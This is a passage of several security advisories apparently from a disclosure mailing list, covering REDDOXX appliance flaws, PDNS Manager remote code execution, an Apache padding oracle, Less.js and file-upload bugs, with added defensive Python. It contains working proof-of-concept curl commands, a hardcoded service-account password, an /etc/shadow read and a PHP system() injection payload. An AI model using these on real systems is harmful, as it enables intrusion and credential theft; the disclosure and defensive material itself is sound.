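Until the appliance is updated, the only defensive signal is the web server log. The following Python is an added example (not part of the advisory and not REDDOXX code) that scans Apache "combined" access-log lines for the unauthenticated diagnostic endpoints shown above, the download location of the resulting capture file, and the RdxEngine JSON-RPC endpoint used in the companion advisories RT-SA-2017-004 and RT-SA-2017-006 on this page. The log lines are constructed for the demonstration; only the URL prefixes come from the advisories.

```python
"""Flag requests to the REDDOXX diagnostic endpoints in Apache access logs."""
import re
from collections import Counter

# Apache 'combined' log format.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# URL prefixes taken from the advisories on this page. Any hit deserves a
# look, because the appliance answered them without authentication.
WATCHED_PREFIXES = {
    "/api/v1/rws/diagnose/": "diagnostic function start/stop/result",
    "/rws/resources/diagnosemanager/": "download of a diagnostic artefact (e.g. pcap)",
    "/RdxEngine/json": "RdxEngine JSON-RPC (FileTransfer.* methods)",
}

# Constructed sample log (not from the advisory); the second line mirrors the
# capture-file download shown in the proof of concept.
SAMPLE_LOG = """\
192.0.2.10 - - [18/May/2017:14:58:22 +0000] "POST /api/v1/rws/diagnose/start HTTP/1.1" 200 0 "-" "curl/7.47.0"
192.0.2.10 - - [18/May/2017:17:01:36 +0000] "GET /rws/resources/diagnosemanager/tcpdump.cap HTTP/1.1" 200 1801530 "-" "Wget/1.17.1"
198.51.100.7 - - [18/May/2017:17:05:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [18/May/2017:17:06:40 +0000] "POST /RdxEngine/json HTTP/1.1" 200 2048 "-" "python-requests/2.13"
192.0.2.10 - - [18/May/2017:17:07:11 +0000] "POST /api/v1/proxy/auth/credentials HTTP/1.1" 200 210 "-" "curl/7.47.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = _LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Return the rule description for a watched path, or None."""
    path = path.split("?", 1)[0]  # ignore the query string
    for prefix, why in WATCHED_PREFIXES.items():
        if path.startswith(prefix):
            return why
    return None


def scan(log_text):
    """Return (ip, timestamp, path, reason) for every request to a watched endpoint."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a real pipeline would count these
        why = classify(rec["path"])
        if why:
            findings.append((rec["ip"], rec["ts"], rec["path"], why))
    return findings


def by_client(findings):
    """Count findings per source address to see which client drives the activity."""
    return Counter(ip for ip, *_ in findings)


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print(by_client(scan(SAMPLE_LOG)))
```

Because the vulnerable endpoints accept requests without any session, a status of 200 on these paths from an address that is not an administrator workstation is the indicator; restricting the administrative interface to a management network at the firewall removes most of the exposure while the update is scheduled.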


Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

The diagnostic functions of the REDDOXX appliance can be used without
authentication. This allows attackers to, for example, capture network
traffic. During a penetration test it was possible to capture multiple
emails and also POP3 login attempts with cleartext credentials. This is
rated as a high risk.


Timeline


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/



[FD] [RT-SA-2017-007] Undocumented Administrative Service Account in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Undocumented Administrative Service Account in REDDOXX Appliance

RedTeam Pentesting discovered an undocumented service account in the
REDDOXX appliance software, which allows attackers to access the
administrative interface of the appliance and change its configuration.


Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Hidden Service Account
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-007
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


Through the ISO provided on the vendor's homepage [1], it was possible
to analyze the files in a typical REDDOXX appliance [0] installation. As
part of this process, hardcoded credentials for a service account were
found in a .NET binary file. With these credentials, it was possible to
authenticate against the administrative interface.


Proof of Concept


The following curl command-line shows an unsuccessful login attempt with
invalid credentials against the administrative interface:


$ curl --silent -H 'Content-Type: application/json' \
--data '{"UserName": "redteam@local", "Password":"redteam"}' \
http://www.example.com/api/v1/proxy/auth/credentials | jq .
{
  "ResponseStatus": {
"ErrorCode": "Unauthorized",
"Message": "Invalid UserName or Password",
"Errors": []
  }
}



When the credentials extracted from the binaries are provided however,
the webserver returns a session ID instead of an error message,
indicating a successful login:


$ curl --silent -H 'Content-Type: application/json' \
--data '{"UserName": "rdx-build-in-service-user@local", "Password":"rdx!1ntern4l"}' \
http://www.example.com/api/v1/proxy/auth/credentials | jq .
{
  "SessionId": "Qm5odfSFB2tVh8De6HjD",
  "UserName": "rdx-build-in-service-user@local",
  "DisplayName": "",
  "ResponseStatus": {}
}



Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

The hidden service account allows attackers to authenticate to the
administrative interface of the appliance. With this level of access,
the appliance can be completely reconfigured. For example, core
functionalities, such as spam filtering or archiving, can be disabled.
RedTeam Pentesting assumes that the hidden service account is present
on all REDDOXX installations and rates its presence as a high risk.


Timeline


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)



[FD] [RT-SA-2017-006] Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
"method":"FileTransfer.GetDirectoryList","params":{"Directory": "/etc/"}}' \
'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName'
"chatscripts"
"gtk-2.0"
"xen"
"dbus-1"
"request-key.d"
"smartmontools"
"console"
"skel"
"xml"
"initramfs-tools"
"sysctl.d"
"pear"
"sudoers.d"
"cron.monthly"
"rc5.d"
"init"
"byobu"
"pki"
"xpdf"
"cron.weekly"
"snmp"
"ld.so.conf.d"
[...]


Since the process handling the requests runs with root privileges, it
was also possible to read the contents of the file "/etc/shadow", which
holds the local password hashes:


$ curl --silent --data-binary '{"id":"{----}",'\
'"method":"FileTransfer.DownloadFile","params":{"FileName": "/etc/shadow",'\
'"Sequence": 1,"ChunkSize": 1}}' 'http://www.example.com/RdxEngine/json' \
| jq -r .result.ChunkData | tr -d '\r\n' | base64 -d
root:$6$$YYY[...]:14993:0:9:7:::
daemon:*:16652:0:9:7:::
bin:*:16652:0:9:7:::
sys:*:16652:0:9:7:::
sync:*:16652:0:9:7:::
games:*:16652:0:9:7:::
man:*:16652:0:9:7:::
lp:*:16652:0:9:7:::
mail:*:16652:0:9:7:::
news:*:16652:0:9:7:::
uucp:*:16652:0:9:7:::
proxy:*:16652:0:9:7:::
www-data:*:16652:0:9:7:::
backup:*:16652:0:9:7:::
list:*:16652:0:9:7:::
irc:*:16652:0:9:7:::
gnats:*:16652:0:9:7:::
nobody:*:16652:0:9:7:::
libuuid:!:16652:0:9:7:::
syslog:*:16652:0:9:7:::
messagebus:*:16899:0:9:7:::
sshd:*:16899:0:9:7:::
vboxadd:!:16899::
statd:*:16899:0:9:7:::
admin:$1$$ZZ:14054:0:9:7:::
clamav:!:16899:0:9:7:::
ntp:*:16899:0:9:7:::
hacluster:!:16899:0:9:7:::
firebird:*:16899:0:9:7:::
redis:!:16899:0:9:7:::
snmp:*:16899:0:9:7:::
bind:*:16899:0:9:7:::
smbadmin:!:17037:0:9:7:::
smbuser:!:17037:0:9:7:::



Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

Attackers with access to a REDDOXX appliance are able to retrieve
directory listings and content of arbitrary files. Although this
vulnerability requires attackers to submit a valid session ID, the
vulnerabilities described in rt-sa-2017-004 [2] and rt-sa-2017-005 [3]
show how this requirement can be fulfilled even by attackers without
valid credentials. Additionally, the RdxEngine process handling the
requests to the vulnerable methods runs with root privileges, allowing
attackers to read any file on the filesystem and, for example, extract
the local user hashes for offline brute-force attacks. This
vulnerability is therefore rated as a high risk.
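The FileTransfer methods above accept any path the caller names. As an added example (not the advisory's or REDDOXX's code), the following Python shows how a file-download RPC of the shape used here (Sequence/ChunkSize in, base64 ChunkData out, field names taken from the advisory) can be confined to one export directory. The check is the same for RT-SA-2017-004 and RT-SA-2017-006: resolve the client-supplied name against the base directory and reject anything that ends up outside it, including absolute paths, ".." components and symlinks. The export directory and its contents are constructed for the demonstration.

```python
"""Confining a 'download file' RPC to one allowed directory."""
import base64
import os
import tempfile

MAX_CHUNK = 1 << 20  # assumed upper bound on ChunkSize


class AccessDenied(PermissionError):
    """Requested path lies outside the directory the service may export."""


def resolve_in_base(base_dir, requested):
    """Map a client-supplied name onto a path inside base_dir, or raise.

    os.path.join() discards base_dir when `requested` is absolute (as in
    '/etc/shadow'), and realpath() collapses '..' and symlinks; the
    commonpath comparison afterwards is what actually enforces containment.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise AccessDenied(requested)
    return candidate


def is_allowed(base_dir, requested):
    try:
        resolve_in_base(base_dir, requested)
        return True
    except AccessDenied:
        return False


def download_chunk(base_dir, file_name, sequence, chunk_size):
    """Return one base64-encoded chunk of a file inside base_dir."""
    if not (isinstance(sequence, int) and sequence >= 1):
        raise ValueError("Sequence must be a positive integer")
    if not (isinstance(chunk_size, int) and 1 <= chunk_size <= MAX_CHUNK):
        raise ValueError("ChunkSize out of range")
    path = resolve_in_base(base_dir, file_name)  # raises AccessDenied if outside
    if not os.path.isfile(path):
        raise FileNotFoundError(file_name)
    with open(path, "rb") as fh:
        fh.seek((sequence - 1) * chunk_size)
        data = fh.read(chunk_size)
    return {"Sequence": sequence, "ChunkData": base64.b64encode(data).decode()}


def make_sample_tree():
    """Constructed export directory for the demo: one file plus a symlink that
    points outside the directory (realpath() resolves it, so it is rejected)."""
    base = tempfile.mkdtemp(prefix="rdx-export-")
    with open(os.path.join(base, "report.txt"), "wb") as fh:
        fh.write(b"hello export")
    try:
        os.symlink(os.path.dirname(base), os.path.join(base, "escape"))
    except OSError:
        pass  # symlinks unavailable on this platform; traversal checks still apply
    return base


if __name__ == "__main__":
    base = make_sample_tree()
    print(download_chunk(base, "report.txt", 1, 5))
    for name in ("/etc/shadow", "../../etc/passwd", "escape/anything"):
        print(name, "allowed" if is_allowed(base, name) else "denied")
```

The path check addresses only the disclosure itself. The advisory's two other points still need separate treatment: the RPC must verify a real administrative session rather than just the presence of a session ID, and the RdxEngine process should drop root privileges so that a future bypass cannot reach /etc/shadow at all.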


Timeline


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-005



[FD] [RT-SA-2017-004] Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:104:65534::/var/lib/nfs:/bin/false
admin:x:0:0:admin,,,:/home/admin:/opt/reddoxx/local/scripts/admin.sh
clamav:x:105:111::/var/lib/clamav:/bin/false
ntp:x:106:112::/home/ntp:/bin/false
hacluster:x:107:113:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
firebird:x:108:114:Firebird Database Administator,,,:/var/lib/firebird:/bin/bash
redis:x:109:115:redis server,,,:/var/lib/redis:/bin/false
snmp:x:110:116::/var/lib/snmp:/bin/false
bind:x:111:117::/var/cache/bind:/bin/false
smbadmin:x:1001:1001::/home/smbadmin:/bin/false
smbuser:x:1002:1002::/home/smbuser:/bin/false



Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

This vulnerability allows attackers to download arbitrary files from any
filesystem reachable on the appliance, provided the path and filename
are known. Depending on the configuration of the appliance, attackers
can read the credentials stored in the configuration files or extract
session IDs from log files. No authentication checks are in place.
Therefore, the vulnerability poses a high risk.


Timeline


2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-003



[FD] [RT-SA-2017-003] Cross-Site Scripting in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
5-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
    (Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004



[FD] [RT-SA-2017-011] Remote Command Execution in PDNS Manager

2017-07-05 Thread RedTeam Pentesting GmbH
---

Because addslashes() escapes single and double quotes, the name of the
GET variable cannot be written as a quoted string. It was therefore
built from chr() calls, which evaluate to the string "cmd".

Since Git commit 3bf4e28 [1] from 12 December 2016, PDNS Manager uses
the PHP PDO class to establish the database connection. Because the PDO
class is quite liberal in what it accepts in its Data Source Name
parameter, the configuration parameters shown above are accepted and
yield a valid database connection; the additional data in the "port"
parameter is simply ignored by the PDO class. Finally, the file
config/config-user.php will be written with the following content:


http://example.com/config/config-user.php?cmd=uname%20-a



Proof of Concept


1. Check if install.php is still available and can be used to write a new
configuration by visiting the following URL:

http://example.com/install.php

2. Set up a database that PDNS Manager can connect to.

3. Send an HTTP POST request with a manipulated "port" parameter, e.g.


curl -H 'Content-Type: application/json' --data \
'{"host":"attacker-system.example.com",'\
'"user":"root",'\
'"password":"secret",'\
'"database":"pdnsdb",'\
'"port":"3306;system($_GET[chr(99).chr(109).chr(100)])",'\
'"userName":"administrator",'\
'"userPassword":"password",'\
'"type":"mysql"}' \
http://example.com/api/install.php


4. Run arbitrary commands:


http://example.com/config/config-user.php?cmd=uname%20-a
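The root cause is that the installer generates PHP source from request parameters and relies on addslashes() as its only filter. The following Python is an added illustration of that bug class (it is not PDNS Manager's code; the config template, field names and validation rules are assumptions for the example): the "vulnerable" renderer escapes quotes but interpolates the port as bare code, so a payload without quotes passes untouched, while the hardened renderer validates each field against its expected type and emits strings as single-quoted PHP literals in which only backslash and quote are special.

```python
"""Why quote-escaping does not make generated PHP safe, and what does."""
import ipaddress
import re

# Assumed shape of the generated file; it stands in for config/config-user.php
# and is not the project's real template. The port is numeric, hence unquoted.
TEMPLATE_VULNERABLE = """<?php
$config['host'] = "{host}";
$config['port'] = {port};
$config['user'] = "{user}";
$config['password'] = "{password}";
$config['database'] = "{database}";
"""
TEMPLATE_SAFE = """<?php
$config['host'] = {host};
$config['port'] = {port};
$config['user'] = {user};
$config['password'] = {password};
$config['database'] = {database};
"""
_HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")
_DB_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")


def addslashes(s):
    """PHP addslashes(): backslash-escape quotes, backslashes and NUL."""
    return re.sub(r"([\"'\\\\\x00])", r"\\\1", s)


def render_vulnerable(params):
    # Every value is escaped, yet the port lands in the file as bare code:
    # '3306;system(...)' contains no quote, so addslashes() leaves it intact.
    return TEMPLATE_VULNERABLE.format(**{k: addslashes(str(v)) for k, v in params.items()})


def php_string_literal(s):
    """Single-quoted PHP literal: only backslash and quote need escaping."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def validate(params):
    """Type-check every field; raises ValueError instead of emitting bad code."""
    host = str(params["host"])
    try:
        ipaddress.ip_address(host)
    except ValueError:
        if not _HOST_RE.match(host):
            raise ValueError(f"invalid host: {host!r}")
    port = params["port"]
    if isinstance(port, str):
        if not port.isdigit():
            raise ValueError(f"port is not a decimal integer: {port!r}")
        port = int(port)
    if not (isinstance(port, int) and 1 <= port <= 65535):
        raise ValueError(f"port out of range: {port!r}")
    database = str(params["database"])
    if not _DB_NAME_RE.match(database):
        raise ValueError(f"invalid database name: {database!r}")
    return {"host": host, "port": port, "user": str(params["user"]),
            "password": str(params["password"]), "database": database}


def render_safe(params):
    v = validate(params)
    return TEMPLATE_SAFE.format(
        host=php_string_literal(v["host"]), port=v["port"],
        user=php_string_literal(v["user"]), password=php_string_literal(v["password"]),
        database=php_string_literal(v["database"]))


def is_accepted(params):
    try:
        render_safe(params)
        return True
    except ValueError:
        return False
```

Even with correct rendering, the installer itself is the larger exposure: the advisory's workaround (make sure config/config-user.php exists so install.php refuses to run) and removing install.php after setup remain necessary, since an installer that can be re-run by anyone rewrites the database credentials as well as the code.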



Workaround
==

Ensure that config/config-user.php exists.


Fix
===

The problem was fixed in the Git master branch in commit ccc4232 [2].
The stable release v1.2.1 and earlier versions are not affected.


Security Risk
=

The vulnerability is deemed to be of medium risk. The number of
installations that are configured in the way described should be rather
low, as it is not the recommended way of installing PDNS Manager and the
development version of PDNS Manager needs to have been used. However, if
such a configuration is found, arbitrary PHP code can be run on the
system. Depending on the system's configuration, this can lead to a full
compromise of the host running PDNS Manager.


Timeline


2017-05-16 Vulnerability identified
2017-06-16 Customer approved disclosure to vendor
2017-06-27 Vendor notified
2017-06-29 Vendor released fixed version
2017-07-05 Advisory released


References
==

[0] https://pdnsmanager.lmitsystems.de/
[1] https://github.com/loewexy/pdnsmanager/commit/3bf4e2874a0120d99ae02a1a9f4a6e74094c7dc1
[2] https://github.com/loewexy/pdnsmanager/commit/ccc423291cb0e6f8c58849f71821e7425b7c030e



[FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto

2016-12-23 Thread RedTeam Pentesting GmbH
the session data. The Python script can also be used to encrypt a new
session containing the username "admin":


$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\
RU= username=admin

Encrypted session:
sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY

real    3m38.002s
user    0m8.536s
sys     0m0.512s



Sending this newly encrypted session to the server shows that the
username is now "admin":


$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\
zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb

your username is admin



Workaround
==

Use a different means to store the session, e.g. in a database by using
mod_session_dbd.


Fix
===

Update to Apache HTTP version 2.4.25 (see [2]).


Security Risk
=

Applications which use mod_session_crypto usually store sensitive values
in the session and rely on an attacker's inability to decrypt or modify
the session. Successful exploitation of the padding oracle vulnerability
subverts this mechanism and allows attackers to construct sessions with
arbitrary attacker-specified content. Depending on the application, this
may completely subvert the application's security. Therefore, this
vulnerability poses a high risk.
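What makes the session a padding oracle is the order of operations: the server decrypts first and only then reports whether the PKCS#7 padding was valid, so an attacker who modifies ciphertext bytes learns something from each answer. The following Python is an added example (not Apache's mod_session_crypto code) that reproduces that behaviour on a stand-in cipher and contrasts it with encrypt-then-MAC, where every modified token is rejected by the HMAC check before any decryption happens. The 4-round Feistel "block cipher" is a deliberately toy construction so the example runs on the standard library; it is an assumption in place of AES and must not be reused for real data.

```python
"""Unauthenticated CBC (padding oracle) versus encrypt-then-MAC, on a toy cipher."""
import hashlib
import hmac
import os

BLOCK = 16


class PaddingError(Exception):
    pass


class AuthError(Exception):
    pass


# Toy block cipher: 4-round Feistel network keyed with SHA-256 (stand-in for AES).
def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, right, rnd))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, left, rnd)), left
    return left + right


def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError("bad PKCS#7 padding")
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, cur), prev)
        prev = cur
    return out


def seal_unauthenticated(enc_key, message, iv=None):
    iv = iv or os.urandom(BLOCK)
    return iv + cbc_encrypt(enc_key, iv, pad(message))


def open_unauthenticated(enc_key, token):
    # Decrypt, then check padding: whether PaddingError is raised depends on
    # attacker-chosen ciphertext bytes. That observable difference is the oracle.
    return unpad(cbc_decrypt(enc_key, token[:BLOCK], token[BLOCK:]))


def seal_authenticated(enc_key, mac_key, message, iv=None):
    body = seal_unauthenticated(enc_key, message, iv)
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()


def open_authenticated(enc_key, mac_key, token):
    body, tag = token[:-32], token[-32:]
    expected = hmac.new(mac_key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        raise AuthError("token modified")  # one answer for every tampered token
    return open_unauthenticated(enc_key, body)


def tamper_outcomes(opener, token, position):
    """Set byte `position` to every other value and collect the opener's reactions.
    More than one distinct outcome means the server leaks plaintext information."""
    outcomes = set()
    for value in range(256):
        if value == token[position]:
            continue
        modified = token[:position] + bytes([value]) + token[position + 1:]
        try:
            opener(modified)
            outcomes.add("accepted")
        except PaddingError:
            outcomes.add("padding error")
        except AuthError:
            outcomes.add("auth error")
    return outcomes


def demo(enc_key=b"E" * 16, mac_key=b"M" * 16, message=b"username=guest"):
    iv = b"\x00" * BLOCK  # fixed IV only to keep the demo deterministic
    unauth = seal_unauthenticated(enc_key, message, iv)
    auth = seal_authenticated(enc_key, mac_key, message, iv)
    pos = len(unauth) - BLOCK - 1  # last byte of the block feeding the final block
    return (tamper_outcomes(lambda t: open_unauthenticated(enc_key, t), unauth, pos),
            tamper_outcomes(lambda t: open_authenticated(enc_key, mac_key, t), auth, pos))
```

Running demo() shows the unauthenticated opener answering with both "accepted" and "padding error" depending on the modified byte, which is exactly the distinction a padding-oracle tool such as the one referenced in [1] drives; the authenticated opener answers "auth error" for every modification. The fixed httpd release closes the oracle in the same spirit, and the workaround of moving session storage server-side (mod_session_dbd) removes the attacker's access to the ciphertext altogether.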


Timeline


2016-01-11 Vulnerability identified
2016-01-12 Customer approved disclosure to vendor
2016-01-12 CVE number requested
2016-01-20 Vendor notified
2016-01-22 Vendor confirmed the vulnerability
2016-02-03 Vendor provided patch
2016-02-04 Apache Security Team assigned CVE number
2016-03-03 Requested status update from vendor, no response
2016-05-02 Requested status update from vendor, no response
2016-07-14 Requested status update and roadmap from vendor
2016-07-21 Vendor confirms working on a new release and inquired whether the
   patch fixes the vulnerability
2016-07-22 RedTeam confirms
2016-08-24 Requested status update from vendor
2016-08-29 Vendor states that there is no concrete timeline
2016-12-05 Vendor announces a release
2016-12-20 Vendor released fixed version
2016-12-23 Advisory released


References
==

[1] https://github.com/mwielgoszewski/python-paddingoracle
[2] http://httpd.apache.org/security/vulnerabilities_24.html



[FD] [RT-SA-2016-003] Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler

2016-11-24 Thread RedTeam Pentesting GmbH
compiler. This vulnerability can be exploited in
various scenarios: If an application takes user-input and feeds it to
the Less compiler, an attacker can gain code execution and compromise
the system running the Less compiler. If a user downloads and compiles a
malicious LESS file, an attacker can compromise the user's system.

RedTeam Pentesting discovered and exploited this vulnerability in a
penetration test. However, it became increasingly clear after
consultation with the LESS development team that the encountered
situation is likely relatively rare. The reason for that is that LESS
files are usually compiled on the server-side once and most often do not
contain user-supplied content. In cases where LESS files do contain or
consist of user-supplied content, the browser-based implementation [3]
of the Less compiler is the typical choice.

Still, the official Less documentation does not mention the compiler's
feature to evaluate inline JavaScript and the consequential risks. Thus,
users are likely to be unaware that embedding user-controlled content
into a LESS file may result in arbitrary code execution. Therefore,
RedTeam Pentesting decided to release this advisory, to bring the users'
attention to this important fact.


Timeline


2016-03-18 Vulnerability identified
2016-05-03 Advisory provided to customer
2016-05-31 Customer approved disclosure to vendor
2016-06-24 Advisory sent to vendor
2016-07-05 Vendor debates whether it is a security issue or a
   documentation issue
2016-07-12 Vendor opts for waiting until release 3.0, which disables the
   option to compile JavaScript by default
2016-07-14 RedTeam downrates the vulnerability from high risk to low to
   acknowledge that it is more of a setup issue
2016-11-24 Still no release 3.0, advisory released


References
==

[0] https://github.com/less/less.js
[1] http://web.archive.org/web/20140202171923/http://www.lesscss.org/
[2] http://www.bennadel.com/blog/2638-executing-javascript-in-the-less-css-precompiler.htm
[3] http://lesscss.org/#client-side-usage



[FD] [RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution

2016-05-31 Thread RedTeam Pentesting GmbH
 phpinfo() function.

However, since the entire content of the upload request is saved to a
temporary file, a regular POST request containing only the code to be
executed is sufficient to exploit this vulnerability. The following
invocation of curl uploads the same PHP script which invokes the
function 'phpinfo()':

$ curl --silent --include --data '<?php phpinfo(); ?>' \
'http://example.com/relay-1-5-3/upload.pl?redteam.php'

In the server's upload directory, the file temp_redteam.php contains
the data that was sent to the upload.pl script:

$ ls relay-1-5-3/uploads/
stats_redteam.php.txt  temp_redteam.php

$ cat temp_redteam.php
<?php phpinfo(); ?>

Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/temp_redteam.php will again yield
the server's output of the phpinfo() function.

Using either of these methods, an attacker is able to upload arbitrary
files to the affected web server, for example in order to execute PHP
code with the privileges of the web server process.


Workaround
==

One possible workaround would be to prevent the execution of files in
the upload directory and deliver them as attachments instead.


Fix
===

None.


Security Risk
=

This vulnerability allows unauthenticated attackers to upload arbitrary
files to the affected system. In the web server's and project's default
configuration it is very likely that this may be used to execute
arbitrary commands with the privileges of the web server process. This
is possible without authentication, thereby providing no barrier for
attackers. It is therefore rated as a high risk. Since this software is
quite old and not well maintained, it is likely that additional
vulnerabilities exist. However, this was not further evaluated.


Timeline


2015-11-19 Vulnerability discovered
2016-04-07 Customer approved disclosure of vulnerability
2016-05-12 Developers contacted, project is no longer maintained
2016-05-31 Advisory published



[FD] [RT-SA-2016-004] Websockify: Remote Code Execution via Buffer Overflow

2016-05-31 Thread RedTeam Pentesting GmbH
Advisory: Websockify: Remote Code Execution via Buffer Overflow

RedTeam Pentesting discovered a buffer overflow vulnerability in the C
implementation of Websockify, which allows attackers to execute
arbitrary code.


Details
===

Product: Websockify C implementation
Affected Versions: all versions <= 0.8.0
Fixed Versions: versions since commit 192ec6f (2016-04-22) [0]
Vulnerability Type: Buffer Overflow
Security Risk: high
Vendor URL: https://github.com/kanaka/websockify
Vendor Status: fixed
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-004
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"websockify was formerly named wsproxy and was part of the noVNC
project.

At the most basic level, websockify just translates WebSockets traffic
to normal TCP socket traffic. Websockify accepts the WebSockets
handshake, parses it, and then begins forwarding traffic between the
client and the target in both directions."

(from the project's readme)


More Details


For each new connection, websockify forks and calls the function
do_handshake() to receive a client's WebSocket handshake. The
following excerpt shows some of the source code responsible for
receiving the client's data from the socket file descriptor:



ws_ctx_t *do_handshake(int sock) {
